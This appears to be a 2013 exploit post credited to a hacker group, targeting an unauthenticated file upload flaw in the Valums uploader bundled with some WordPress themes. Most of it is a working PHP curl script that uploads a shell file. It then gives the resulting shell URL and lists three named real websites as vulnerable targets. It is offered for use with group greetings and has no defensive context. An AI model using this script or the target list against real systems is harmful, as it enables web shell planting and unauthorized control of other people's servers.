WordPress Valums Uploader Shell Upload

`# Exploit Title: Wordpress Valums Uploader Shell Upload Exploit  
# Date: 4-1-2013  
# Author: JingoBD  
# Tested on: Windows 7 And Ubuntu  
# Team: BANGLADESH CYBER ARMY  
# Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, And All Of My BCA Friends. They Rockz. :D   
ALSO ALL BANGLADESHI Hacker Team..   
  
=================== EXPLOIT====================  
<?php  
  
$uploadfile="bangla.php";   
$ch =  
curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php");  
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('qqfile'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
  
?>  
  
Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php  
  
  
Some Vulnerable Sites:   
http://www.mmodels.ca/wp/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php  
http://www.yellowfly.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php  
http://www3.mhcable.com/v2/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.phps  
  
=========================END======================  
  
Thanks  
http://facebook.com/bdcyberarmy  
`